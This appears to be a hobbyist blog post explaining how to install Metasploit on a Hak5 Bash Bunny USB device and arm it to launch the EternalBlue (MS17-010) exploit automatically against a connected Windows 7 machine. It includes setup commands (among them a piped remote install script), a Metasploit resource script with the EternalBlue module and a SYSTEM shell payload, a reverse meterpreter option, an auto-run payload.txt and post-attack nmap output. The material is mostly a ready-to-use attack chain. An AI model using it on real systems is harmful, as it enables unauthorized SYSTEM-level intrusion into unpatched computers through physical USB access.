I have finally got the Bashbunny from HAK5, and I can say this is really an Imperial Star Destroyer compared to the Teensy++ 2.0 A-Wing that I have used 6 years ago.
Bashbunny is capable of running Metasploit framework as it has 512 MB RAM and an ARMv7 CPU (v7l) and internal 3 GB flash storage.
Eternalblue exploit that has been ported to Metasploit framework is an ideal candidate for the Bashbunny automatic exploitation. A true hacking device :)
Image may be NSFW.
Clik here to view.
So lets first prepare the Bashbunny device (make sure you can ssh to the device and set internet connection sharing – setup is covered here) (( I have done all the setup on a linux system))
Image may be NSFW.
Clik here to view.
We need to prepare a couple of things in order to be able to run Metasploit on the Bashbunny so here are the rough steps I have done
Make sure to set some date for TLS/SSL to work ;) # date -s "20170523" Add this to /etc/apt/sources.list deb http://http.us.debian.org/debian/ jessie-updates main # apt-get update # apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev libpcap-dev libpq-dev libreadline6-dev libsqlite3-dev libssl-dev libsvn1 libtool libxml2 libxml2-dev libxslt-dev libyaml-dev locate ncurses-dev openssl wget xsel zlib1g zlib1g-dev # curl -sSL https://get.rvm.io | bash -s stable # source /etc/profile.d/rvm.sh # rvm requirements # rvm list known # rvm install 2.3.3 # vi /root/.bashrc Add at the end source /etc/profile/rvm.sh rvm use 2.3.3 --default # mkdir /root/METASPLOIT # cd /root/METASPLOIT/ # wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh # chmod +x msf_vps_installer.sh # ./msf_vps_installer.sh # git config --global user.name "USER" # git config --global user.email "user@example.com" # ./msfupdate
You should be able to run Metasploit on the Bashbunny now
Image may be NSFW.
Clik here to view.
Now that we have a working Metasploit on the Bashbunny all that is really needed is to arm it and load the eternalblue exploit via an RC metasploit script, here is an example script eternal-cmd.rc (Remote IP is a default that DHCPD will assign to the target system that you connect the Bashbunny to)
Check the /etc/dhcp/dhcpd.conf range 172.16.64.10 172.16.64.12 and set to only one value range 172.16.64.64 172.16.64.64
use exploit/windows/smb/ms17_010_eternalblue set PAYLOAD windows/x64/exec set RHOST 172.16.64.64 set CMD cmd.exe exploit
The above is ideal when we want to get a NT SYSTEM/AUTHORITY shell on the target Windows 7 SP1 x64 (unlocked)
If the target is locked we can use another payload such as :
Image may be NSFW.
Clik here to view.
(Something like windows/x64/meterpreter/reverse_https would be ideal as we already know the the LHOST value already for the Bashbunny
Image may be NSFW.
Clik here to view.
So RHOST would be again 172.16.64.64 and LHOST 172.16.64.1 … This can be easily scripted via Metasploit RC script so ;)
The Metasploit RC scripts should be placed in the /root/metasploit-framework on the Bashbunny so we can call it from the PAYLOAD.TXT for the corresponding Attach Switch position .
So ideally this would look like this (switch1 or switch 2) payload.txt
#!/bin/bash LED SETUP ATTACKMODE RNDIS_ETHERNET #Set some current time ..... check your watch date -s "20170523 23:23" LED ATTACK /root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc & LED FINISH
The target Windows 7 should have an accessible SMB port 445 from the USB network that Bashbunny device create. Default Windows system has a firewall on so the attack wont work as the port is blocked. For the demonstration purpose we assume there is no firewall on ..
After a while you should get a NT AUTHORITY\ SYSTEM cmd shell pop up on your Win 7 desktop :)
Image may be NSFW.
Clik here to view.
This is a nmap scan after the successful Eternalblue attack on the target Windows 7
Host is up, received arp-response (0.0014s latency). Scanned at 2017-05-23 23:09:43 for 149s Not shown: 990 closed ports Reason: 990 resets PORT STATE SERVICE REASON VERSION 135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack ttl 128 Microsoft Windows 7 - 10 microsoft-ds 5357/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49152/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC 49153/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC 49154/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC 49155/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC 49156/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC 49157/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
Here is a short demo (done via VirtualBox that simulates the actual Bashbunny attack)
Image may be NSFW.
Clik here to view.
Image may be NSFW.Clik here to view.
